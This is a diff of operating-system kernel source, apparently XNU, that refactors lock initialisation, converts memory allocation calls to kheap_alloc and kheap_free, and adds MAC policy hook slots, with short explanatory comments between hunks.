-static lck_grp_attr_t *mcache_llock_grp_attr;
+static LCK_GRP_DECLARE(mcache_llock_grp, "mcache.list");
+static LCK_MTX_DECLARE(mcache_llock, &mcache_llock_grp);
 static struct zone *mcache_zone;
 static const uint32_t mcache_reap_interval = 15;
 static const uint32_t mcache_reap_interval_leeway = 2;
@@ -122,9 +120,6 @@ static unsigned int mcache_flags = 0;
 
 int mca_trn_max = MCA_TRN_MAX;
 
-#define DUMP_MCA_BUF_SIZE       512
-static char *mca_dump_buf;
-
 static mcache_bkttype_t mcache_bkttype[] = {
        { 1, 4096, 32768, NULL },
        { 3, 2048, 16384, NULL },
@@ -140,7 +135,7 @@ static mcache_bkttype_t mcache_bkttype[] = {
 
 static mcache_t *mcache_create_common(const char *, size_t, size_t,
     mcache_allocfn_t, mcache_freefn_t, mcache_auditfn_t, mcache_logfn_t,
-    mcache_notifyfn_t, void *, u_int32_t, int, int);
+    mcache_notifyfn_t, void *, u_int32_t, int);
 static unsigned int mcache_slab_alloc(void *, mcache_obj_t ***,
     unsigned int, int);
 static void mcache_slab_free(void *, mcache_obj_t *, boolean_t);
@@ -189,12 +184,6 @@ mcache_init(void)
        ncpu = ml_wait_max_cpus();
        (void) mcache_cache_line_size();        /* prime it */
 
-       mcache_llock_grp_attr = lck_grp_attr_alloc_init();
-       mcache_llock_grp = lck_grp_alloc_init("mcache.list",
-           mcache_llock_grp_attr);
-       mcache_llock_attr = lck_attr_alloc_init();
-       mcache_llock = lck_mtx_alloc_init(mcache_llock_grp, mcache_llock_attr);
-
        mcache_reap_tcall = thread_call_allocate(mcache_reap_timeout, NULL);
        mcache_update_tcall = thread_call_allocate(mcache_update, NULL);
        if (mcache_reap_tcall == NULL || mcache_update_tcall == NULL) {
@@ -258,11 +247,10 @@ mcache_cache_line_size(void)
  */
 __private_extern__ mcache_t *
 mcache_create(const char *name, size_t bufsize, size_t align,
-    u_int32_t flags, int wait)
+    u_int32_t flags, int wait __unused)
 {
        return mcache_create_common(name, bufsize, align, mcache_slab_alloc,
-                  mcache_slab_free, mcache_slab_audit, NULL, NULL, NULL, flags, 1,
-                  wait);
+                  mcache_slab_free, mcache_slab_audit, NULL, NULL, NULL, flags, 1);
 }
 
 /*
@@ -274,10 +262,10 @@ __private_extern__ mcache_t *
 mcache_create_ext(const char *name, size_t bufsize,
     mcache_allocfn_t allocfn, mcache_freefn_t freefn, mcache_auditfn_t auditfn,
     mcache_logfn_t logfn, mcache_notifyfn_t notifyfn, void *arg,
-    u_int32_t flags, int wait)
+    u_int32_t flags, int wait __unused)
 {
        return mcache_create_common(name, bufsize, 0, allocfn,
-                  freefn, auditfn, logfn, notifyfn, arg, flags, 0, wait);
+                  freefn, auditfn, logfn, notifyfn, arg, flags, 0);
 }
 
 /*
@@ -287,7 +275,7 @@ static mcache_t *
 mcache_create_common(const char *name, size_t bufsize, size_t align,
     mcache_allocfn_t allocfn, mcache_freefn_t freefn, mcache_auditfn_t auditfn,
     mcache_logfn_t logfn, mcache_notifyfn_t notifyfn, void *arg,
-    u_int32_t flags, int need_zone, int wait)
+    u_int32_t flags, int need_zone)
 {
        mcache_bkttype_t *btp;
        mcache_t *cp = NULL;
@@ -296,23 +284,11 @@ mcache_create_common(const char *name, size_t bufsize, size_t align,
        unsigned int c;
        char lck_name[64];
 
-       /* If auditing is on and print buffer is NULL, allocate it now */
-       if ((flags & MCF_DEBUG) && mca_dump_buf == NULL) {
-               int malloc_wait = (wait & MCR_NOSLEEP) ? M_NOWAIT : M_WAITOK;
-               MALLOC(mca_dump_buf, char *, DUMP_MCA_BUF_SIZE, M_TEMP,
-                   malloc_wait | M_ZERO);
-               if (mca_dump_buf == NULL) {
-                       return NULL;
-               }
-       }
-
-       buf = zalloc(mcache_zone);
+       buf = zalloc_flags(mcache_zone, Z_WAITOK | Z_ZERO);
        if (buf == NULL) {
                goto fail;
        }
 
-       bzero(buf, MCACHE_ALLOC_SIZE);
-
        /*
         * In case we didn't get a cache-aligned memory, round it up
         * accordingly.  This is needed in order to get the rest of
@@ -358,10 +334,7 @@ mcache_create_common(const char *name, size_t bufsize, size_t align,
        (void) snprintf(cp->mc_name, sizeof(cp->mc_name), "mcache.%s", name);
 
        (void) snprintf(lck_name, sizeof(lck_name), "%s.cpu", cp->mc_name);
-       cp->mc_cpu_lock_grp_attr = lck_grp_attr_alloc_init();
-       cp->mc_cpu_lock_grp = lck_grp_alloc_init(lck_name,
-           cp->mc_cpu_lock_grp_attr);
-       cp->mc_cpu_lock_attr = lck_attr_alloc_init();
+       cp->mc_cpu_lock_grp = lck_grp_alloc_init(lck_name, LCK_GRP_ATTR_NULL);
 
        /*
         * Allocation chunk size is the object's size plus any extra size
@@ -383,20 +356,14 @@ mcache_create_common(const char *name, size_t bufsize, size_t align,
         * Initialize the bucket layer.
         */
        (void) snprintf(lck_name, sizeof(lck_name), "%s.bkt", cp->mc_name);
-       cp->mc_bkt_lock_grp_attr = lck_grp_attr_alloc_init();
        cp->mc_bkt_lock_grp = lck_grp_alloc_init(lck_name,
-           cp->mc_bkt_lock_grp_attr);
-       cp->mc_bkt_lock_attr = lck_attr_alloc_init();
-       lck_mtx_init(&cp->mc_bkt_lock, cp->mc_bkt_lock_grp,
-           cp->mc_bkt_lock_attr);
+           LCK_GRP_ATTR_NULL);
+       lck_mtx_init(&cp->mc_bkt_lock, cp->mc_bkt_lock_grp, LCK_ATTR_NULL);
 
        (void) snprintf(lck_name, sizeof(lck_name), "%s.sync", cp->mc_name);
-       cp->mc_sync_lock_grp_attr = lck_grp_attr_alloc_init();
        cp->mc_sync_lock_grp = lck_grp_alloc_init(lck_name,
-           cp->mc_sync_lock_grp_attr);
-       cp->mc_sync_lock_attr = lck_attr_alloc_init();
-       lck_mtx_init(&cp->mc_sync_lock, cp->mc_sync_lock_grp,
-           cp->mc_sync_lock_attr);
+           LCK_GRP_ATTR_NULL);
+       lck_mtx_init(&cp->mc_sync_lock, cp->mc_sync_lock_grp, LCK_ATTR_NULL);
 
        for (btp = mcache_bkttype; chunksize <= btp->bt_minbuf; btp++) {
                continue;
@@ -412,8 +379,7 @@ mcache_create_common(const char *name, size_t bufsize, size_t align,
                mcache_cpu_t *ccp = &cp->mc_cpu[c];
 
                VERIFY(IS_P2ALIGNED(ccp, CPU_CACHE_LINE_SIZE));
-               lck_mtx_init(&ccp->cc_lock, cp->mc_cpu_lock_grp,
-                   cp->mc_cpu_lock_attr);
+               lck_mtx_init(&ccp->cc_lock, cp->mc_cpu_lock_grp, LCK_ATTR_NULL);
                ccp->cc_objs = -1;
                ccp->cc_pobjs = -1;
        }
@@ -896,17 +862,9 @@ mcache_destroy(mcache_t *cp)
        cp->mc_slab_free = NULL;
        cp->mc_slab_audit = NULL;
 
-       lck_attr_free(cp->mc_bkt_lock_attr);
        lck_grp_free(cp->mc_bkt_lock_grp);
-       lck_grp_attr_free(cp->mc_bkt_lock_grp_attr);
-
-       lck_attr_free(cp->mc_cpu_lock_attr);
        lck_grp_free(cp->mc_cpu_lock_grp);
-       lck_grp_attr_free(cp->mc_cpu_lock_grp_attr);
-
-       lck_attr_free(cp->mc_sync_lock_attr);
        lck_grp_free(cp->mc_sync_lock_grp);
-       lck_grp_attr_free(cp->mc_sync_lock_grp_attr);
 
        /*
         * TODO: We need to destroy the zone here, but cannot do it
@@ -1358,7 +1316,7 @@ mcache_cache_update(mcache_t *cp)
        int need_bkt_resize = 0;
        int need_bkt_reenable = 0;
 
-       lck_mtx_assert(mcache_llock, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&mcache_llock, LCK_MTX_ASSERT_OWNED);
 
        mcache_bkt_ws_update(cp);
 
@@ -1645,13 +1603,9 @@ mcache_audit_free_verify_set(mcache_audit_t *mca, void *base, size_t offset,
 #define MCA_TRN_PREV ((mca->mca_next_trn + mca_trn_max - 1) % mca_trn_max)
 
 __private_extern__ char *
-mcache_dump_mca(mcache_audit_t *mca)
+mcache_dump_mca(char buf[static DUMP_MCA_BUF_SIZE], mcache_audit_t *mca)
 {
-       if (mca_dump_buf == NULL) {
-               return NULL;
-       }
-
-       snprintf(mca_dump_buf, DUMP_MCA_BUF_SIZE,
+       snprintf(buf, DUMP_MCA_BUF_SIZE,
            "mca %p: addr %p, cache %p (%s) nxttrn %d\n"
            DUMP_TRN_FMT()
            DUMP_TRN_FMT(),
@@ -1663,13 +1617,15 @@ mcache_dump_mca(mcache_audit_t *mca)
            DUMP_TRN_FIELDS("last", MCA_TRN_LAST),
            DUMP_TRN_FIELDS("previous", MCA_TRN_PREV));
 
-       return mca_dump_buf;
+       return buf;
 }
 
 __private_extern__ void
 mcache_audit_panic(mcache_audit_t *mca, void *addr, size_t offset,
     int64_t expected, int64_t got)
 {
+       char buf[DUMP_MCA_BUF_SIZE];
+
        if (mca == NULL) {
                panic("mcache_audit: buffer %p modified after free at "
                    "offset 0x%lx (0x%llx instead of 0x%llx)\n", addr,
@@ -1680,7 +1636,7 @@ mcache_audit_panic(mcache_audit_t *mca, void *addr, size_t offset,
 
        panic("mcache_audit: buffer %p modified after free at offset 0x%lx "
            "(0x%llx instead of 0x%llx)\n%s\n",
-           addr, offset, got, expected, mcache_dump_mca(mca));
+           addr, offset, got, expected, mcache_dump_mca(buf, mca));
        /* NOTREACHED */
        __builtin_unreachable();
 }
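
mcache_dump_mca() no longer depends on a lazily allocated global mca_dump_buf; the caller now supplies a DUMP_MCA_BUF_SIZE buffer, as mcache_audit_panic() above does with a stack array. A small sketch of a caller under the new signature (the wrapper name and the printf destination are illustrative only):

    static void
    log_mca_example(mcache_audit_t *mca)
    {
            char buf[DUMP_MCA_BUF_SIZE];    /* caller-owned, replaces mca_dump_buf */

            printf("%s\n", mcache_dump_mca(buf, mca));
    }
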
index 7621bdec37e4b4c4c6a0dd543ab0ca955a7607bb..89a714051a8b6ef0ca649d000df80f099507744c 100644 (file)
@@ -121,7 +121,7 @@ common_hook(void)
        return rv;
 }
 
-#if (MAC_POLICY_OPS_VERSION != 69)
+#if (MAC_POLICY_OPS_VERSION != 74)
 # error "struct mac_policy_ops doesn't match definition in mac_policy.h"
 #endif
 /*
@@ -238,9 +238,9 @@ const static struct mac_policy_ops policy_ops = {
        CHECK_SET_HOOK(mount_label_init)
        CHECK_SET_HOOK(mount_label_internalize)
 
-       .mpo_reserved38 = (mpo_reserved_hook_t *)common_hook,
-       .mpo_reserved39 = (mpo_reserved_hook_t *)common_hook,
-       .mpo_reserved40 = (mpo_reserved_hook_t *)common_hook,
+       CHECK_SET_HOOK(proc_check_expose_task_with_flavor)
+       CHECK_SET_HOOK(proc_check_get_task_with_flavor)
+       CHECK_SET_HOOK(proc_check_task_id_token_get_task)
 
        CHECK_SET_HOOK(pipe_check_ioctl)
        CHECK_SET_HOOK(pipe_check_kqfilter)
@@ -339,8 +339,8 @@ const static struct mac_policy_ops policy_ops = {
        CHECK_SET_HOOK(socket_check_setsockopt)
        CHECK_SET_HOOK(socket_check_getsockopt)
 
-       .mpo_reserved50 = (mpo_reserved_hook_t *)common_hook,
-       .mpo_reserved51 = (mpo_reserved_hook_t *)common_hook,
+       CHECK_SET_HOOK(proc_check_get_movable_control_port)
+       CHECK_SET_HOOK(proc_check_dyld_process_info_notify_register)
        .mpo_reserved52 = (mpo_reserved_hook_t *)common_hook,
        .mpo_reserved53 = (mpo_reserved_hook_t *)common_hook,
        .mpo_reserved54 = (mpo_reserved_hook_t *)common_hook,
@@ -351,7 +351,8 @@ const static struct mac_policy_ops policy_ops = {
        .mpo_reserved59 = (mpo_reserved_hook_t *)common_hook,
        .mpo_reserved60 = (mpo_reserved_hook_t *)common_hook,
        .mpo_reserved61 = (mpo_reserved_hook_t *)common_hook,
-       .mpo_reserved62 = (mpo_reserved_hook_t *)common_hook,
+
+       CHECK_SET_HOOK(iokit_check_open_service)
 
        CHECK_SET_HOOK(system_check_acct)
        CHECK_SET_HOOK(system_check_audit)
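
The version guard moves from 69 to 74 to match the current struct mac_policy_ops layout, and slots that used to be .mpo_reservedNN initializers are now filled through CHECK_SET_HOOK for the new proc_check_* and iokit_check_open_service hooks. CHECK_SET_HOOK is defined earlier in policy_check.c and is not shown in this diff; it presumably expands to a designated initializer that points the hook at common_hook, roughly along these lines (assumed expansion, for illustration only):

    #define CHECK_SET_HOOK(x) .mpo_ ## x = (mpo_ ## x ## _t *)common_hook,
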
index 38106d0430f4e59151a3e028cd66c352be1a0b8a..3b5fc195a0a47592987e54989568ef34050de685 100644 (file)
@@ -181,13 +181,11 @@ static const struct fileops psemops = {
        .fo_kqfilter = fo_no_kqfilter,
 };
 
-static lck_grp_t       *psx_sem_subsys_lck_grp;
-static lck_grp_attr_t  *psx_sem_subsys_lck_grp_attr;
-static lck_attr_t      *psx_sem_subsys_lck_attr;
-static lck_mtx_t        psx_sem_subsys_mutex;
+static LCK_GRP_DECLARE(psx_sem_subsys_lck_grp, "posix semaphores");
+static LCK_MTX_DECLARE(psx_sem_subsys_mutex, &psx_sem_subsys_lck_grp);
 
-#define PSEM_SUBSYS_LOCK() lck_mtx_lock(& psx_sem_subsys_mutex)
-#define PSEM_SUBSYS_UNLOCK() lck_mtx_unlock(& psx_sem_subsys_mutex)
+#define PSEM_SUBSYS_LOCK() lck_mtx_lock(&psx_sem_subsys_mutex)
+#define PSEM_SUBSYS_UNLOCK() lck_mtx_unlock(&psx_sem_subsys_mutex)
 #define PSEM_SUBSYS_ASSERT_HELD() LCK_MTX_ASSERT(&psx_sem_subsys_mutex, LCK_MTX_ASSERT_OWNED)
 
 
@@ -195,19 +193,6 @@ static int psem_cache_add(struct pseminfo *psemp, struct psemname *pnp, struct p
 static void psem_cache_delete(struct psemcache *pcp);
 int psem_cache_purge_all(proc_t);
 
-
-/* Initialize the mutex governing access to the posix sem subsystem */
-__private_extern__ void
-psem_lock_init( void )
-{
-       psx_sem_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       psx_sem_subsys_lck_grp = lck_grp_alloc_init("posix shared memory", psx_sem_subsys_lck_grp_attr);
-
-       psx_sem_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&psx_sem_subsys_mutex, psx_sem_subsys_lck_grp, psx_sem_subsys_lck_attr);
-}
-
 /*
  * Lookup an entry in the cache
  *
@@ -470,13 +455,13 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval)
         * allowed and the one at the front of the LRU list is in use.
         * Otherwise we use the one at the front of the LRU list.
         */
-       MALLOC(pcp, struct psemcache *, sizeof(struct psemcache), M_SHM, M_WAITOK | M_ZERO);
+       pcp = kheap_alloc(KM_SHM, sizeof(struct psemcache), Z_WAITOK | Z_ZERO);
        if (pcp == PSEMCACHE_NULL) {
                error = ENOMEM;
                goto bad;
        }
 
-       MALLOC(new_pinfo, struct pseminfo *, sizeof(struct pseminfo), M_SHM, M_WAITOK | M_ZERO);
+       new_pinfo = kheap_alloc(KM_SHM, sizeof(struct pseminfo), Z_WAITOK | Z_ZERO);
        if (new_pinfo == NULL) {
                error = ENOSPC;
                goto bad;
@@ -517,7 +502,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval)
                }
        }
 
-       MALLOC(new_pnode, struct psemnode *, sizeof(struct psemnode), M_SHM, M_WAITOK | M_ZERO);
+       new_pnode = kheap_alloc(KM_SHM, sizeof(struct psemnode), Z_WAITOK | Z_ZERO);
        if (new_pnode == NULL) {
                error = ENOSPC;
                goto bad;
@@ -616,7 +601,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval)
         * new . and we must free them.
         */
        if (incache) {
-               FREE(pcp, M_SHM);
+               kheap_free(KM_SHM, pcp, sizeof(struct psemcache));
                pcp = PSEMCACHE_NULL;
                if (new_pinfo != PSEMINFO_NULL) {
                        /* return value ignored - we can't _not_ do this */
@@ -624,7 +609,7 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval)
 #if CONFIG_MACF
                        mac_posixsem_label_destroy(new_pinfo);
 #endif
-                       FREE(new_pinfo, M_SHM);
+                       kheap_free(KM_SHM, new_pinfo, sizeof(struct pseminfo));
                        new_pinfo = PSEMINFO_NULL;
                }
        }
@@ -644,13 +629,9 @@ sem_open(proc_t p, struct sem_open_args *uap, user_addr_t *retval)
 bad_locked:
        PSEM_SUBSYS_UNLOCK();
 bad:
-       if (pcp != PSEMCACHE_NULL) {
-               FREE(pcp, M_SHM);
-       }
+       kheap_free(KM_SHM, pcp, sizeof(struct psemcache));
 
-       if (new_pnode != PSEMNODE_NULL) {
-               FREE(new_pnode, M_SHM);
-       }
+       kheap_free(KM_SHM, new_pnode, sizeof(struct psemnode));
 
        if (fp != NULL) {
                fp_free(p, indx, fp);
@@ -669,7 +650,7 @@ bad:
 #if CONFIG_MACF
                mac_posixsem_label_destroy(new_pinfo);
 #endif
-               FREE(new_pinfo, M_SHM);
+               kheap_free(KM_SHM, new_pinfo, sizeof(struct pseminfo));
        }
 
        if (pnbuf != NULL) {
@@ -720,13 +701,13 @@ psem_unlink_internal(struct pseminfo *pinfo, struct psemcache *pcache)
 
        if (!pinfo->psem_usecount) {
                psem_delete(pinfo);
-               FREE(pinfo, M_SHM);
+               kheap_free(KM_SHM, pinfo, sizeof(struct pseminfo));
        } else {
                pinfo->psem_flags |= PSEM_REMOVED;
        }
 
        psem_cache_delete(pcache);
-       FREE(pcache, M_SHM);
+       kheap_free(KM_SHM, pcache, sizeof(struct psemcache));
        return 0;
 }
 
@@ -1045,12 +1026,12 @@ psem_close(struct psemnode *pnode)
                PSEM_SUBSYS_UNLOCK();
                /* lock dropped as only semaphore is destroyed here */
                error = psem_delete(pinfo);
-               FREE(pinfo, M_SHM);
+               kheap_free(KM_SHM, pinfo, sizeof(struct pseminfo));
        } else {
                PSEM_SUBSYS_UNLOCK();
        }
        /* subsystem lock is dropped when we get here */
-       FREE(pnode, M_SHM);
+       kheap_free(KM_SHM, pnode, sizeof(struct psemnode));
        return error;
 }
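
psem_lock_init() can be deleted because the subsystem mutex and its lock group are now created at compile time with LCK_GRP_DECLARE/LCK_MTX_DECLARE, the same pattern this commit applies in mcache.c, posix_shm.c, proc_uuid_policy.c and sysv_msg.c. A minimal sketch of the pattern, with hypothetical names:

    /* Hedged sketch: statically declared group + mutex, no *_lock_init() call needed. */
    static LCK_GRP_DECLARE(example_subsys_lck_grp, "example subsystem");
    static LCK_MTX_DECLARE(example_subsys_mutex, &example_subsys_lck_grp);

    #define EXAMPLE_SUBSYS_LOCK()   lck_mtx_lock(&example_subsys_mutex)
    #define EXAMPLE_SUBSYS_UNLOCK() lck_mtx_unlock(&example_subsys_mutex)
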
 
index bffc46999c305d5b234ce29883020342437d5031..4f22edd2855298ca91054dc230f38ad1dfe041f0 100644 (file)
@@ -81,7 +81,6 @@
 #include <mach/vm_prot.h>
 #include <mach/vm_inherit.h>
 #include <mach/kern_return.h>
-#include <mach/memory_object_control.h>
 
 #include <vm/vm_map.h>
 #include <vm/vm_protos.h>
@@ -204,28 +203,13 @@ static const struct fileops pshmops = {
 /*
  * Everything here is protected by a single mutex.
  */
-static lck_grp_t       *psx_shm_subsys_lck_grp;
-static lck_grp_attr_t  *psx_shm_subsys_lck_grp_attr;
-static lck_attr_t      *psx_shm_subsys_lck_attr;
-static lck_mtx_t        psx_shm_subsys_mutex;
+static LCK_GRP_DECLARE(psx_shm_subsys_lck_grp, "posix shared memory");
+static LCK_MTX_DECLARE(psx_shm_subsys_mutex, &psx_shm_subsys_lck_grp);
 
 #define PSHM_SUBSYS_LOCK() lck_mtx_lock(& psx_shm_subsys_mutex)
 #define PSHM_SUBSYS_UNLOCK() lck_mtx_unlock(& psx_shm_subsys_mutex)
 #define PSHM_SUBSYS_ASSERT_HELD()  LCK_MTX_ASSERT(&psx_shm_subsys_mutex, LCK_MTX_ASSERT_OWNED)
 
-
-__private_extern__ void
-pshm_lock_init( void )
-{
-       psx_shm_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       psx_shm_subsys_lck_grp =
-           lck_grp_alloc_init("posix shared memory", psx_shm_subsys_lck_grp_attr);
-
-       psx_shm_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&psx_shm_subsys_mutex, psx_shm_subsys_lck_grp, psx_shm_subsys_lck_attr);
-}
-
 /*
  * Lookup an entry in the cache. Only the name is used from "look".
  */
@@ -358,7 +342,7 @@ shm_open(proc_t p, struct shm_open_args *uap, int32_t *retval)
         * Allocate data structures we need. We parse the userspace name into
         * a pshm_info_t, even when we don't need to O_CREAT.
         */
-       MALLOC(new_pinfo, pshm_info_t *, sizeof(pshm_info_t), M_SHM, M_WAITOK | M_ZERO);
+       new_pinfo = kheap_alloc(KM_SHM, sizeof(pshm_info_t), Z_WAITOK | Z_ZERO);
        if (new_pinfo == NULL) {
                error = ENOSPC;
                goto bad;
@@ -392,7 +376,8 @@ shm_open(proc_t p, struct shm_open_args *uap, int32_t *retval)
        /*
         * Will need a new pnode for the file pointer
         */
-       MALLOC(new_pnode, pshmnode_t *, sizeof(pshmnode_t), M_SHM, M_WAITOK | M_ZERO);
+       new_pnode = kheap_alloc(KM_SHM, sizeof(pshmnode_t),
+           Z_WAITOK | Z_ZERO);
        if (new_pnode == NULL) {
                error = ENOSPC;
                goto bad;
@@ -516,9 +501,7 @@ bad:
        /*
         * Delete any allocated unused data structures.
         */
-       if (new_pnode != NULL) {
-               FREE(new_pnode, M_SHM);
-       }
+       kheap_free(KM_SHM, new_pnode, sizeof(pshmnode_t));
 
        if (fp != NULL) {
                fp_free(p, indx, fp);
@@ -531,7 +514,7 @@ done:
                        mac_posixshm_label_destroy(&new_pinfo->pshm_hdr);
                }
 #endif
-               FREE(new_pinfo, M_SHM);
+               kheap_free(KM_SHM, new_pinfo, sizeof(pshm_info_t));
        }
        return error;
 }
@@ -628,7 +611,7 @@ pshm_truncate(
                }
 
                /* get a list entry to track the memory object */
-               MALLOC(pshmobj, pshm_mobj_t *, sizeof(pshm_mobj_t), M_SHM, M_WAITOK);
+               pshmobj = kheap_alloc(KM_SHM, sizeof(pshm_mobj_t), Z_WAITOK);
                if (pshmobj == NULL) {
                        kret = KERN_NO_SPACE;
                        mach_memory_entry_port_release(mem_object);
@@ -666,7 +649,7 @@ out:
                SLIST_REMOVE_HEAD(&pinfo->pshm_mobjs, pshmo_next);
                PSHM_SUBSYS_UNLOCK();
                mach_memory_entry_port_release(pshmobj->pshmo_memobject);
-               FREE(pshmobj, M_SHM);
+               kheap_free(KM_SHM, pshmobj, sizeof(pshm_mobj_t));
                PSHM_SUBSYS_LOCK();
        }
        pinfo->pshm_flags &= ~PSHM_ALLOCATING;
@@ -987,7 +970,8 @@ shm_unlink(proc_t p, struct shm_unlink_args *uap, __unused int32_t *retval)
        /*
         * Get the name from user args.
         */
-       MALLOC(name_pinfo, pshm_info_t *, sizeof(pshm_info_t), M_SHM, M_WAITOK | M_ZERO);
+       name_pinfo = kheap_alloc(KHEAP_TEMP, sizeof(pshm_info_t),
+           Z_WAITOK | Z_ZERO);
        if (name_pinfo == NULL) {
                error = ENOSPC;
                goto bad;
@@ -1031,9 +1015,7 @@ shm_unlink(proc_t p, struct shm_unlink_args *uap, __unused int32_t *retval)
 bad_unlock:
        PSHM_SUBSYS_UNLOCK();
 bad:
-       if (name_pinfo != NULL) {
-               FREE(name_pinfo, M_SHM);
-       }
+       kheap_free(KHEAP_TEMP, name_pinfo, sizeof(pshm_info_t));
        return error;
 }
 
@@ -1080,11 +1062,11 @@ pshm_deref(pshm_info_t *pinfo)
                while ((pshmobj = SLIST_FIRST(&pinfo->pshm_mobjs)) != NULL) {
                        SLIST_REMOVE_HEAD(&pinfo->pshm_mobjs, pshmo_next);
                        mach_memory_entry_port_release(pshmobj->pshmo_memobject);
-                       FREE(pshmobj, M_SHM);
+                       kheap_free(KM_SHM, pshmobj, sizeof(pshm_mobj_t));
                }
 
                /* free the pinfo itself */
-               FREE(pinfo, M_SHM);
+               kheap_free(KM_SHM, pinfo, sizeof(pshm_info_t));
 
                PSHM_SUBSYS_LOCK();
        }
@@ -1110,9 +1092,7 @@ pshm_closefile(struct fileglob *fg, __unused vfs_context_t ctx)
        }
 
        PSHM_SUBSYS_UNLOCK();
-       if (pnode != NULL) {
-               FREE(pnode, M_SHM);
-       }
+       kheap_free(KM_SHM, pnode, sizeof(pshmnode_t));
 
        return error;
 }
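
Note how the error paths change shape here: the "if (new_pnode != NULL)" style guards in front of FREE() are dropped and kheap_free() is called unconditionally, which is only safe if kheap_free() treats a NULL pointer as a no-op, as the shm_open()/shm_unlink() cleanup above now assumes. A sketch of cleanup written in that style (hypothetical helper, types taken from the file):

    /* Hedged sketch: unconditional frees, assuming kheap_free(heap, NULL, size) does nothing. */
    static void
    pshm_cleanup_example(pshm_info_t *pinfo, pshmnode_t *pnode)
    {
            kheap_free(KM_SHM, pinfo, sizeof(pshm_info_t));   /* pinfo may be NULL */
            kheap_free(KM_SHM, pnode, sizeof(pshmnode_t));    /* pnode may be NULL */
    }
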
index 04d1aeda4c2d3a880eb8e4ff8148b07b260e5937..3d38327c9cd15768986b0db22fccdbcdb94a3ee3 100644 (file)
 #define dprintf(...) do { } while(0)
 #endif
 
-static lck_grp_attr_t  *proc_uuid_policy_subsys_lck_grp_attr;
-static lck_grp_t       *proc_uuid_policy_subsys_lck_grp;
-static lck_attr_t      *proc_uuid_policy_subsys_lck_attr;
-static lck_mtx_t        proc_uuid_policy_subsys_mutex;
+static LCK_GRP_DECLARE(proc_uuid_policy_subsys_lck_grp,
+    "proc_uuid_policy_subsys_lock");
+static LCK_MTX_DECLARE(proc_uuid_policy_subsys_mutex,
+    &proc_uuid_policy_subsys_lck_grp);
 
 #define PROC_UUID_POLICY_SUBSYS_LOCK() lck_mtx_lock(&proc_uuid_policy_subsys_mutex)
 #define PROC_UUID_POLICY_SUBSYS_UNLOCK() lck_mtx_unlock(&proc_uuid_policy_subsys_mutex)
@@ -85,6 +85,12 @@ struct proc_uuid_policy_entry {
        uint32_t        flags;  /* policy flag for that UUID */
 };
 
+/*
+ * If you need accounting for KM_PROC_UUID_POLICY consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_PROC_UUID_POLICY KHEAP_DEFAULT
+
 static int
 proc_uuid_policy_insert(uuid_t uuid, uint32_t flags);
 
@@ -103,11 +109,6 @@ proc_uuid_policy_clear(uint32_t flags);
 void
 proc_uuid_policy_init(void)
 {
-       proc_uuid_policy_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-       proc_uuid_policy_subsys_lck_grp = lck_grp_alloc_init("proc_uuid_policy_subsys_lock", proc_uuid_policy_subsys_lck_grp_attr);
-       proc_uuid_policy_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&proc_uuid_policy_subsys_mutex, proc_uuid_policy_subsys_lck_grp, proc_uuid_policy_subsys_lck_attr);
-
        proc_uuid_policy_hashtbl = hashinit(PROC_UUID_POLICY_HASH_SIZE, M_PROC_UUID_POLICY, &proc_uuid_policy_hash_mask);
        proc_uuid_policy_table_gencount = 1;
        proc_uuid_policy_count = 0;
@@ -128,7 +129,8 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t flags)
                return EINVAL;
        }
 
-       MALLOC(entry, struct proc_uuid_policy_entry *, sizeof(*entry), M_PROC_UUID_POLICY, M_WAITOK | M_ZERO);
+       entry = kheap_alloc(KM_PROC_UUID_POLICY, sizeof(struct proc_uuid_policy_entry),
+           Z_WAITOK | Z_ZERO);
 
        memcpy(entry->uuid, uuid, sizeof(uuid_t));
        entry->flags = flags;
@@ -140,7 +142,7 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t flags)
                /* The UUID is already in the list. Update the flags. */
                foundentry->flags |= flags;
                error = 0;
-               FREE(entry, M_PROC_UUID_POLICY);
+               kheap_free(KM_PROC_UUID_POLICY, entry, sizeof(struct proc_uuid_policy_entry));
                entry = NULL;
                BUMP_PROC_UUID_POLICY_GENERATION_COUNT();
        } else {
@@ -158,7 +160,7 @@ proc_uuid_policy_insert(uuid_t uuid, uint32_t flags)
        PROC_UUID_POLICY_SUBSYS_UNLOCK();
 
        if (error) {
-               FREE(entry, M_PROC_UUID_POLICY);
+               kheap_free(KM_PROC_UUID_POLICY, entry, sizeof(struct proc_uuid_policy_entry));
                dprintf("Failed to insert proc uuid policy (%s,0x%08x), table full\n", uuidstr, flags);
        } else {
                dprintf("Inserted proc uuid policy (%s,0x%08x)\n", uuidstr, flags);
@@ -222,7 +224,7 @@ proc_uuid_policy_remove(uuid_t uuid, uint32_t flags)
 
        /* If we had found a pre-existing entry, deallocate its memory now */
        if (delentry && should_delete) {
-               FREE(delentry, M_PROC_UUID_POLICY);
+               kheap_free(KM_PROC_UUID_POLICY, delentry, sizeof(struct proc_uuid_policy_entry));
        }
 
        if (error) {
@@ -332,7 +334,8 @@ proc_uuid_policy_clear(uint32_t flags)
        /* Memory deallocation happens after the hash lock is dropped */
        LIST_FOREACH_SAFE(searchentry, &deletehead, entries, tmpentry) {
                LIST_REMOVE(searchentry, entries);
-               FREE(searchentry, M_PROC_UUID_POLICY);
+               kheap_free(KM_PROC_UUID_POLICY, searchentry,
+                   sizeof(struct proc_uuid_policy_entry));
        }
 
        dprintf("Clearing proc uuid policy table\n");
index d7f3f5cbdfb5e6f25a5dff08f0afc2d7e1f8390d..167a99befcad90bf7dc874205a63eda73f8c6522 100644 (file)
@@ -65,8 +65,6 @@
 
 int evh_debug = 0;
 
-MALLOC_DEFINE(M_EVENTHANDLER, "eventhandler", "Event handler records");
-
 SYSCTL_NODE(_kern, OID_AUTO, eventhandler, CTLFLAG_RW | CTLFLAG_LOCKED,
     0, "Eventhandler");
